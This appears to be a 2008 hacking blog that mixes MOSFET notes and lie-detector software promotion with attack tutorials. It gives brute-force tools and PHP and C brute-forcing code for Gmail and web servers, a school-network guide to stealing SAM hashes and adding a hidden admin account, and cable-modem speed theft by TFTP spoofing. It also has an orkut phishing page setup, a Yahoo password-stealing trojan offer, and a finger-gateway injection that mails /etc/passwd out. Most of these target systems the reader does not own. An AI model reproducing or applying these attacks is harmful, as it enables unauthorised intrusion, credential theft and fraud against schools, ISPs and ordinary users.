Friday, October 31, 2008


A field effect transistor has only two layers of semiconductor material, one on top of the other. Electricity flows through one of the layers, called the channel. A voltage connected to the other layer, called the gate, interferes with the current flowing in the channel. Thus, the voltage connected to the gate controls the strength of the current in the channel. There are two basic varieties of field effect transistors-the junction field effect transistor(JFET) and the metal oxide semiconductor field effect transistor (MOSFET). Most of the transistors contained in today's integrated circuits are MOSFETS's.
Posted by 3xtr3m3 at 2:31 AM 0 comments

Field-Effect Transistor:

The function of Field Effect Transistors is similar to bipolar transistors (especially the type we will discuss here) but there are a few differences. They have 3 terminals as shown below. Two general types of FETs are the 'N' channel and the 'P' channel MOSFETs. Here we will only discuss the N channel. Actually, in this section, we'll only be discussing the most commonly used enhancement mode N channel MOSFET (Metal Oxide Semiconductor Field Effect Transistor). Its schematic symbol is below. The arrows show how the LEGS of the actual transistor correspond to the schematic symbol.


Current Control:
The control terminal is called the gate. Remember that the base terminal of a bipolar transistor passes a small amount of current. The gate on the FET passes virtually no current when driven with D.C. When driving the gate with high frequency pulsed D.C. or A.C. there may be a small amount of current flow. The transistor's "turn on" (a.k.a. threshold) voltage varies from one FET to another but is approximately 3.3 volts with respect to the source.

When FETs are used in the audio output section of an amplifier, the Vgs (voltage from gate to source) is rarely higher than 3.5 volts. When FETs are used in switching power supplies, the Vgs is usually much higher (10 to 15 volts). When the gate voltage is above approximately 5 volts, it becomes more efficient (which means less voltage drop across the FET and therefore less power dissipation).

MOSFETS are commonly used because they are easier to drive in high current applications (such as the switching power supplies found in car audio amplifiers). If a bipolar transistor is used, a fraction of the collector/emitter current must flow through the base junction. In high current situations where there is significant collector/emitter current, the base current may be significant. FETs can be driven by very little current (compared to the bipolar transistors). The only current that flows from the drive circuit is the current that flows due to the capacitance. As you already know, when DC is applied to a capacitor, there is an initial surge then the current flow stops. When the gate of an FET is driven with a high frequency signal, the drive circuit essentially sees only a small value capacitor. For low to intermediate frequencies, the drive circuit has to deliver little current. At very high frequencies or when many FETs are being driven, the drive circuit must be able to deliver more current.

Friday, March 28, 2008

Saturday, March 1, 2008



hi all.. m back wid some softwares .. I noe it shuld be posted in softwares section./.. bt i guess membrs neve visits it ... so m makin topic fr LIE detectr software ...
name soundz intrstin na
n yahh keep this software here fr atleast 2 days .. uske baad transfr links of software to software section no probs...
bt mods pls dnt del topic coz its rare n vry diffrnt typea software ...
Lie detector software
This is a fun software which knows when you tell lies
try it and u will see!!

Some explanation on how it operates

Truster is a fully computerized voice stress analyzer that allows you to detect the truth instantly. Based on an ingenious new algorithm to detect vocal stress, Truster is a simple yet powerful software tool for identifying a deception on the phone or in person.

What Is The Need?
Ever since people acquired the capability of speech, lying and deception have been inescapable facts of everyday life. Conventional lie detector results are not admissible in court because people can physically alter their behavior to appear to be telling the truth. The human voice on the other hand, cannot be manipulated. It is a complex instrument for expressing a full range of emotional and cognitive states of mind, that even the best voice training in the world cannot overcome. Better yet, vocal segments can be gathered and analyzed over the phone, taken from TV or radio shows, or even in a face to face conversation, without the subject being aware
What Is IT Based On?
Did you know that the human voice consists of six global levels?
1. The textual level - the words we speak.
2. The identifying level - unique elements in every individual's voice.
3. The intonation level - the way we express ourselves.
4. The emotional level - an uncontrolled element of the voice that indicates the
level of excitement and the emotions they attach to what they are saying.
5. The cognitive level - an uncontrolled element of the voice that indicates the
amount of conflict or agreement with the spoken sentence.
6. The physiological element - indicates the stress, physiological alertness and
general physiological condition.

Truster examines the emotional, cognitive and physiological patterns in our voice to deliver accurate messages regarding vocal segments of a conversation or broadcast.

How Does It Work?
Truster produces a computerized analysis of the speech flow to distinguish between nonverbal emotional, cognitive and stressful elements within the human voice. When all is said and done, a lie is a deviation from how one would answer an obvious question such as, What is your name? A subject may answer the exact same question differently in different situations. For example, the reaction to asking a subject how much money they made in a
certain period will vary depending on whether it is during a free conversation, job interview, or legal proceeding. Lying or attempting to be faithful to the truth requires much more exertion than answering an obvious question, but it also depends on the circumstances.

What Do The Results Mean?
The proper interpretation of the results is crucial to the process. There are three main indications that a person is lying. When a person is stressed, confused and excited all at the same time, chances are that they are lying. However, very few people (1%) lie very convincingly without any of the above symptoms because they do not feel that there is anything wrong with lying, and/or they might not feel a need to be faithful to the truth. The system will not detect a lie if a dishonest person claims something happened and genuinely believes it to be true. That is precisely why we recommend using your common sense in analyzing Truster results.

Try to focus on finding deviations in the results. For example, an honest person may get stressed, confused and excited while trying to stick to facts exactly as they remembered them. An honest person may feel that they are speaking the truth but actually be lying to themselves. A person may state that they are going to overcome certain obstacles, but may not truly believe in their capability to do so. Truster will pick that up as a deviation, but it certainly does not mean that the subject is dishonest. They may merely be inaccurate, or unsure of their words, as Truster will display throughout the conversation.

another same typea software
ex-senser lie detctr




hack webmaster protect pages with passwords

webmaster protect pages with passwords to make sure that only those people who have got valid passwords can see them!

but, we can see those password protected pages by bruteforcing!

in this case we are taking the help of a tool named as "Webcracker"

This article simply teaches on "How to Use Webcracker" tO enter password protected pages!

Lets start,

1:first find a password protected page:

For this example, we are taking this Url:

Its a password protected page so, in order to crack its password we need the tool "Webcracker"

Here is the download link to download "Webcracker"


Description OF "Webcracker":


This program exploits a rather large hole
in web site authentication methods.
Password protected websites can be
easily brute-force hacked, because there is
no set limit on the number of time an
incorrect password or User ID can be tried.

Web Cracker was designed for Web Masters
to test the vulnerability of their own
sites. It SHOULD NOT be used by unauthorized
persons to hack into web sites. Such
use is ILLEGAL and could have SEVERE PENALTIES.
Neither myself nor anyone involved
with the development of Web Cracker will be
liable for the misuse of this program.
Use Web Cracker ONLY at your own risk,
ONLY for lawful purposes, and ONLY on your own
web site.

Now, lets start:

1.Download webcracker from the link given above

2.start webcracker

3.See the picture for help on "How to use"

look at the picture carefully!

1.Enter the location of the "username" File
2. Enter the location of the "password" file
3. Enter the password protected "url".

Click the start button below the file menu:

Now, give it some time to crack the username/password for you!

it will take time depending on the complexity of the password!

After some time, you will most likely be receiving a message Screen like this:

Now, just copy the username and password from the list [the one which is showing a resutl of 200 Ok]

open the page in your browser and you are In

RapidShare Bruteforcer!

RapidShare Bruteforcer!


This require the .NET 2.0 Framework installed!

-Bruteforce Attacks.
-List checker. (Check a list of words for premium account names.)


website cracker

This pack was specifically designed for web application or website hacking & cracking. These files are self contained in there zip files so they are free to use without opening and using a AIO pack.

I originally assembled this pack for a friend who wanted a website cracking and hacking toolkit to start him off and I thought why not put it out on the web and save a lot people the time and trouble looking for one.

(Note!! Anti-virus software don't take well to hack-tools and if you get a false warning, ignore it and add the program you want to run to exclusions list because this pack is trojan, backdoor and malicious code FREE.)


Access Driver v4.402
Ares v2.0
Brutus aet2
Caecus 1.2
C-Force V1.01b
Form@ v0.8.2
GoldenEye v1.0.6
HTTP_Bugger v2.2
Sentry 2.0
WebCrack v4.0
wwwHack v1.9
Xfactor v4.2
XpBrute v1.0


Automated Proxy Leecher v1.3
Charon v0.6
Proxy Finder Enterprise v1.95
Proxy Valid G.E.v1
ProxyFire v1.17
ProxyGrab v0.6
ProxyRama 1.7.4
S-P Leecher v2.0

--Proxy Checkers--
Bleach v1.10
Proxy.Checker v.7.4.18


Athena v1.6
Staph v1.25
Z-Leecher v1.1.0


--Advanced Exploiters--
These Tools Have Many Features

Burpsuite v1.1
Paros v3.2.13
Jackal-X v2.4
Triton v2.1
Wikto v1.6

--HTTP Exploiters--

Addebugger v5.0
KSoze's HTTP Exploiter v0.2

--SQL Injection Toolz--

BobCat Alphav0.3
EvilNeedle v0.1
Scully Installer v1.2

--CGI Exploiters--

CCBill-Local Exploiter v0.21
Hephaestus's Ashen Spear v2.5
VoidEye v0.4b4

--Other Good Exploiters--

CMXploiter v4.0
DirBuster v0.9.10
Predator v1.0.5
Web Share Finder 1.2


Sploof v0.90
Spooph v2.1.4
TotalSpoof v1.4.4
ZSpoof v2.3




John the Ripper
PasswordPro v2.4.1.0
-John The Ripper GUI Tools-
Gooey v2
John32 v3.0
John the Ripper GUI
Velocity Cracking Utilities v1.0


Blade's Password Generator
EasyPass v2.0.10
Lucifer v0.5
Passwords & Keys
Raptor 3
S-Cipherer v0.1b
Sentinel Password Generator v1.0
Password Generator
S-Generator v1.0.1
Dabest Wordlist Generators


ALS Novice
Mail Parser

----LOG TOOLS----

Horny Stripper 1.0
Log Sucker 1.3
LogRip v0.52


XP-SP2 TCP Patch

Many Video and Text Tutorials
Wiley The Web Application Hackers Handbook

Thursday, February 28, 2008

How to REALLY hack your school Complete Tutorial

How to REALLY hack your school Complete Tutorial
I. Introduction:
Bored in IRC, and some skids need help, so why not give them
some little tricks instead of the usually methods like gaining
access to CMD.

II. Needed tools:
1> Any linux live distro
Knoppix :
Ubuntu :

2> LM Extractor + Cracker
Cain :
Pwdump2 :

3> Data Transportation
iPod : Yes, an iPod
USB Pen : Flash drive, memory stick, etc...
Floppy : You will need 2; due to the file size

III. Method:
1> Ok first you have to be smart (I know this may be diffuclt for
most of you.) Try to bring your iPod or flash drive to class daily
atleast a week ebfore you actually attempt this, so nothing seems
out of the ordinary. Half of 'rev-eng.' is appearance afterall.

2> Ok, so here it is the last day of the week and we need fucking
admin on the school comps so we can install STEAM and play CS like
homo gamers. When you're teacher is not looking chose a computer
where the screen doesn't face is F.O.V. (field of vision.) Once
you get to it, immediatley pop the cd into the drive, and hold the
power button down for 10seconds to do a force-shutdown also known
as a "scary shutdown."

3> When the live cd boots up login to linux and pull up a terminal.

4> Once in the terminal, plugin your iPod or USB drive (floppies, if
you use them will come later.)

5> Now, (this being a little more linux savy) you will have to check
'fstab' and look for where your iPod or USB drive is and mount it. Make
sure when you mount it, that you mount it with 'write' permissions
otherwise you would get all kinds of errors and you'll be cursing in
the middle of class... see Figure 1.1 ('WTF?!')

6> Once it is mounted go into 'C:\windows\system32\config' and copy
the 'SAM' and 'SYSTEM' files onto your devices. This is also the step
where if you are using floppies to put floppy in for each. WARNING:
depending on amount of users and other factors it may not fit on a
floppy drive.

7> Once retrived, pull out the iPod and/or USB drive. Also don't
forget the LIVE cd you used. Then do another 'scary-shutdown' as
I outlined in Step # 2.

IV. Cracking:
1> So now you're home grab your self some eggog or semen and sit down
on the best computer you have at your house. By now I would've hoped
you downloaded one of the LM hash crackers I outlined above.

2> I prefer Cain & Abel from Open it, click on 'Cracker'
select 'lm' and import the nesscesary files.

3> Have it start, once it has begun set your processor priority a notch
above what it is. DO NOT SET IT TO 'real-time' or 'high.' I would tell
you why, but i'd rather you guys not listen to me and do it anyways =].

4> Depending on the complexity of the password/hash it should be around
8-10 hours of cracking. My schools was something like '34gdfgDf4g5' and
I was finished within a nights rest.

V. Getting in...safely:
Chances are your school runs on windows xp and is using domain-logon.
This is the most common way to monitor, and update a windows network as
large as a public school. So now that you have username/password of the
admin account for one computer in your lab their is a 95% chance it is the
same for all those other accounts. Unfortunatley you come into one big problem


Put simply, you fuck this part up, enjoy suspension/jail.

Walk up to the computer, getting to class early obviously, and unplug the
ethernet cord from the back of the computer. THIS IS ESSENTAIL FOR YOUR

Now logon to the computer using your admin account. Quickly go in and add
another admin user, using the control pannel 'Manage Users.'

TIP: Make sure the name/pass you create for a new admin, is totally random
thus leaving no 'bread crumb trails.'

Logout, then plugback in ethernet cord, and login to your new admin account.



To take this one step further, when you get to your Windows 2000/XP logon
screen look at the domain that you log into.

Resolve the hostname and get the ip. Even without IP you can use remotedesktop
client that comes on all the machines by default. Even if it is not in the menu
because your computer admin thinks he is smart open up 'run' or the address bar on top
of 'My Documents' and type 'mstsc.'

Once opened type in domain name and hit connect. If you see another login window you can
try the admin password you used.


So be careful, use a proxy, etc.'

fbi hacker kit 2.1

Tuesday, February 26, 2008

This AIO contains the tools necessary to gain access to password protect websites. These tools allow you to get proxies, create wordlists, and brutefo

This AIO contains the tools necessary to gain access to password protect websites. These tools allow you to get proxies, create wordlists, and bruteforce attack! Also included is a very in depth tutorial on how to effectively use all of the programs together.

***password is***

Brutus AE2, Brutus AE2 is a forcer tool. Iit cracks passwords online or remotely

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on

This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.

It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success.

Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem

Theory of cable modem working

All the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this this our speed limits will be set.

Our Mission

Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.

Steps to accomplish

1). Get cable modems MAC address
2). Get your ISPs TFTP server IP address
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.
4). Download Image file from ISP`s TFTP server.
5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file
8). Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)
9). Host TFTP server in your computer
10). Put Image file in the base directory of your TFTP
11). Restart your modem
12). Changer your PC's IP back as given by ISP
13). OOPS Done. Start surfing with your new speed

1). Get cable modems MAC address

You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp:// . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP.

2). Get your ISPs TFTP server IP address
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.

For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below

a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem


Experts can use Solarwinds SNMP program


c) Beginners can use DOCSIS Diagnosis utility


d) Beginners can use SNMPWALK Tool

use command "snmpwalk public"

NOTE: Use modem's IP address as "" (SB5100, SB4100 and SB3100) when it asked to provide by any of the above tools. SNMP community is "Public"

Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server
All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)

Among these, the one we need are:
Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)
Configuration filename = isrr.bin (replace this with yours throughout in the doc)
IP fragments created = 0
IP =
IP address. = (the IP address of the cable modem, (replace this with yours throughout in the doc) = 2

Suggestion: You can do this step by sniffing the modem i.e. "" when modem boots up. I never tried this method. Try your luck.

4). Download Image file from ISP`s TFTP server.

For doing this got to your command prompt and use below commands with out quotes and bracket.

"C:\tftp -i GET "

Okay now you got Image file from your ISP`s TFTP server.

5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file

Use docsis tool which you can download from

using this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly created file same as your original image file.

8). Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)

Go to my network place and right click ->properties
Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values
Configure your TPC's TCP settings as below
IP: 194.*.*.90 (replace with the ISP's TFTP server)
Gateway: (replace with your cable modem's IP address)

Note: Gateway should be then only your modem can communicate with computer.

9). Host TFTP server in your computer
10). Put Image file in the base directory of your TFTP
11). Restart your modem

Download TFTP Server software and host TFTP server in your computer
You can download TFTP server from:

Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC

12). Changer your PC's IP back as given by ISP
13). OOPS Done. Start surfing with your new speed

Now you change your TCP settings of your PC back to normal as given by ISP. (I.e. Put your original IP address and gateway)

Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus)

Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12

Have Fun

This is a Tutorial to hack .cfm? and .asp Shops.

This is a Tutorial to hack .cfm? and .asp Shops.
You should look up some sql commands if u encounter an error it really helps!
SQL for server Error:
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ".

Thanks For Repling


Use the tool(s):


Enjoy hacking those cvv2's!!

for education purpose

# This script was created to Brute Force G-Mail Logins,#

# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #

$dic ="your Dictionary file here.txt";


echo "
Gmail Brute Force Attacker

Gmail Brute Force Attacker


Username to brute:




// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20060508 Firefox/",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
$c = curl_init('');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream

//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {

Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."

echo "

Sorry... a password was not found for the account of ".$username." during the dictionary attack.


//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {

Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."

echo "

Sorry... a password was not found for the account of ".$username." during the brute force attack.

echo "

// Function for checking whether the username and password are correct
function check_correct($username, $password)
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
if($str != $wrong) {return true;}
else {return false;}



Hers's the Software for Yahoo hacking...

Hers's the Software for Yahoo hacking...
But remember you all guys would be using at your own risk....
Actually its a trojan...and not the software......

MAGIC PS 1.5 se

which sends password to your yahoo id....

Above is the download link................

Before starting this not forget to ask me that how it works....
becoz it can finish your pc as well............

Brute Force into a Web Server. * * *

Brute Force into a Web Server. * * *
/ *
* Brute Force your way into a Web Server.
* -Works best on computers in the same subnet :-)
* In order to use this:
* 1) Get a dictionary file.
* 2) Compile this program, and run it. The arguments are-
* username dictfile hostname port
* << most websites have 'admin' as a user >>
* 3) Wait for user name and password to appear.
* NOTE: If you want to see the webserver's response,
* define VERBOSE when compiling.
* WARNING: If the webserver logs, it will
* be obvious that you are attacking!
* DISCLAIMER: Please use this program in a
* responsible manner.

extern int errno;
/* Change this to whatever document you want to get off the web server */

char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

unsigned char buf_64[512];
unsigned short socket_timeout=20;
char line[2048];


struct TOKEN {
char *text;
int length;
int index;
enum TOKENTYPE type;

struct BASE64_PARAMS {
unsigned long int accum;
int shift;
int save_shift;

int read_dict_file ( char *buff, FILE *f )
int b, i;
*buff = 0;
do {
while ((b = fgetc(f)) != EOF && (b == ' ' || b == '\t' || b == '\n' || b == '\r'));
if ( b == EOF ) return(0);
for ( i = 0; b != EOF && b != '\n' && b != '\r'; i++ )
buff = (b == '\t') ? ' ': b;
b = fgetc(f);
buff = 0;
while (*buff == '#');


void (*
r_signal(sig, func, fd_socket, fd_accept)) (int)
int sig;
void (*func) ();
int fd_socket;
int fd_accept;
struct sigaction act, oact;

act.sa_handler = func;

act.sa_flags = 0;
act.sa_flags |= SA_RESTART;

if (sigaction(sig, &act, &oact) < 0)
return (SIG_ERR);

return (oact.sa_handler);
/* Read 'n' bytes from a descriptor */
int readn(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
int nleft, nread;

while(nleft > 0) {
if (nread<0)
else if (nread==0)

nleft -=nread;
ptr +=nread;

/* Write 'n' bytes to a descriptor */
int writen(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
int nleft, nwritten;

while(nleft > 0) {
nwritten=write(fd, ptr, nleft);
if(nwritten <= 0)

nleft -= nwritten;
ptr += nwritten;

char * dateTime()
time_t t;
char * s;

s = (char *)ctime((const time_t *)&t);
s[24] = '\0';
return s;
void handle_SIGSEGV (void)
fprintf(stderr, "\nSegmentation Violation! [%s]\n", dateTime());

void handle_SIGINT (void)
fprintf(stderr, "\nSignal Interrupt! [%s]\n", dateTime());

void sendln(int s, char buf[1024]) {
writen(s, buf, strlen(buf), 0);

int readln(int s)
int i,done=0,w, result;
char tmp[1];
struct timeval timeout;
fd_set inputs;

i = 0;

while (!done) {
FD_SET(s, &inputs);
timeout.tv_sec = socket_timeout;
timeout.tv_usec = 0;

result = select(FD_SETSIZE, &inputs,(fd_set *)0, (fd_set *)0,
switch(result) {
case 0:
printf("\n\nSocket Timeout\n");
case -1:
w=readn(s ,tmp, 1);
if (w==0) return 0;
if (tmp[0] != 0) {
line = tmp[0];
if (line == '\n') {
done = 1;
line = 0;
return (i);
/* Code to call out on a socket */
int call_socket(hostname, portnum)
char *hostname;
u_short portnum;
struct sockaddr_in sa;
struct hostent *hp;
int a, s, foo=1;

if ((hp= gethostbyname(hostname)) == NULL) { /* do we know the host's */
errno= ECONNREFUSED; /* address? */
return(-1); /* no */

bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length); /* set address */
sa.sin_family= hp->h_addrtype;
sa.sin_port= htons((u_short)portnum);

if ((s= socket(hp->h_addrtype,SOCK_STREAM,0)) < 0) /* get socket */

/* set socket options so we can try multiple connects */
if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&foo, sizeof(foo)) ==-1) {
fprintf(stderr, "Error setting SO_REUSEADDR socket option in call_socket!\n");
fflush((FILE *)stderr);

if (connect(s,(struct sockaddr *)&sa,sizeof sa) < 0) { /* connect */
perror("connect failed");


int base64_encode( int quit, struct BASE64_PARAMS *e_p,
char *string_to_encode )
int index;
unsigned long int value;
unsigned char blivit;
int z=0;

index = 0;
while ( ( *(string_to_encode+z) ) || (e_p->shift != 0) )
if ( ( *(string_to_encode+z) ) && ( quit == 0 ) )
blivit = *(string_to_encode +z);

if ( *(string_to_encode+z)==0 )
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
if ( (quit == 0) || (e_p->shift != 0) )
value = (unsigned long)blivit;
e_p->accum <<= 8;
e_p->shift += 8;
e_p->accum |= value;
} /* ENDIF */

while ( e_p->shift >= 6 )
e_p->shift -= 6;
value = (e_p->accum >> e_p->shift) & 0x3Fl;
blivit = alphabet[value];

buf_64[index++] = blivit;
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;

if ( quit != 0 )
e_p->shift = 0;

if ( e_p->save_shift == 2 )
buf_64[index++] = '=';
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;

buf_64[index++] = '=';
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
else if ( e_p->save_shift == 4 )
buf_64[index++] = '=';
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
if ( index != 0 )
/* buf_64[index-1]='='; */
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */

return quit;

void encode_string (char *namepass)
struct BASE64_PARAMS e_p;
int quit=0;
register int i;
char * some;

e_p.shift = 0;
e_p.accum = 0;

some=(char *)malloc(256);

/* Nasty hack (forgive the lame coding...) */
some = (char *)namepass;
for (i=0;*(some+i);i++);

base64_encode(quit, &e_p, (char *)some);

void sorry (void)
printf("\nSorry, but I could not get in.\n");
printf("There are two reasons why:\n");
printf("1) The user (argv[1]) does not exist on the webserver.\n");
printf("2) The user exists, but his/her passwd was not in your dict_file.\n");
printf("Have a Nice Day. :-)\n\n");

void usage(char *prog_name)
printf("\nUsage: ");
printf("[%s] username dictfile hostname port\n", prog_name);

int main ( argc, argv )
unsigned int argc;
char **argv;

FILE * dict_fd=NULL;
struct hostent *hp;
unsigned short web_port=0;
int sock_fd=0;
char * dict_word=NULL;
char export_buff[1024];
char * encoded_buffer=NULL;
unsigned short finish_flag=1, success=0;
int foo;
if ( argc !=5 )

r_signal(SIGSEGV, handle_SIGSEGV);
r_signal(SIGINT, handle_SIGINT);

dict_word= (char *)malloc (256);

if ((dict_fd=fopen(argv[2], "r"))==NULL ) {
fprintf(stderr, "\nCould not open dictionary file: [%s]\n%s\n\n",
argv[2], strerror(errno));

if ((hp=(struct hostent *)gethostbyname((char *)argv[3])) == NULL) {
fprintf(stderr, "\nCould not resolve hostname: [%s]\n\n", argv[3]);

web_port = atoi(argv[4]);

encoded_buffer=(char *)malloc(512);

while (read_dict_file(dict_word, dict_fd)) {
if ((sock_fd=call_socket(argv[3], web_port))==-1) {
perror("socket connection");

#ifndef SOLARIS
if ((foo=ioctl(sock_fd, FIONBIO , 1))==-1) {
if ((foo=fcntl(sock_fd, O_NDELAY, 1)) <0) {

sprintf(export_buff, "GET / HTTP/1.0\n");
sendln(sock_fd, export_buff);

sprintf(encoded_buffer, "%s:%s", argv[1], dict_word);
sprintf(export_buff, "Authorization: Basic %s\n\n", buf_64);
sendln(sock_fd, export_buff);

memset(line, '\0', sizeof(line));
while( readln(sock_fd)) {

#ifdef VERBOSE
printf("%s", line);
fflush((FILE *)stdout);

/* Change this to a more sophisticated test. */
/* This test is pretty lame, but works for */
/* all practical purposes. */
if (strstr(line, "nauthorized"))

if (finish_flag) {



if (!success)
else {
printf("\n\nThe UserName is: %s\n", argv[1]);
printf("The Password is: %s\n", dict_word);
printf("\n\n\n ---- Coded by BeastMaster V ----\n");


Sunday, February 24, 2008

Fake Page Trick Again---from Souvik 2 all

Fake Page Trick Again---from Souvik 2 all
Guys who have requested me for new fake page trick in help desk its gud time 4 u guys...

Here i m publishing my new trick

follow da tricks

1. Download the orkut fake page from the following link


2. Download the form text editor "souvik.php" from the below link


3. Download the text file "souvik.txt" from below link


Now what u hav 2 do is

1. Upload the 3 files in a php supported free web host

2. Give the orkut fake page link by ny overcloaking art to ur friends

3. When he put his passwrd to it

Open souvik.txt file in ur uploaded site to see the passwrds

Saturday, February 23, 2008

Hacking from your Web Browser

Hacking from your Web Browser

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hcakers should benifit from this information. We will only cov

er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable… sit back…. and read.

II - Hcaking from your Web Browser

There are several techniques on what I call “Web Browser Hcaking”. Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hcaking:

Lets say you wanted to break into somewhere like …. hmmmm AOL. The first thing we would do is type in their web site in the URL: Http:// The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http:// If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page… just scan the page for any mailto refs. Go back to the finger box and type in this query…… ; /bin/mail < etc/passwd …this string takes nobody and emails the passwd file to your email

address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.
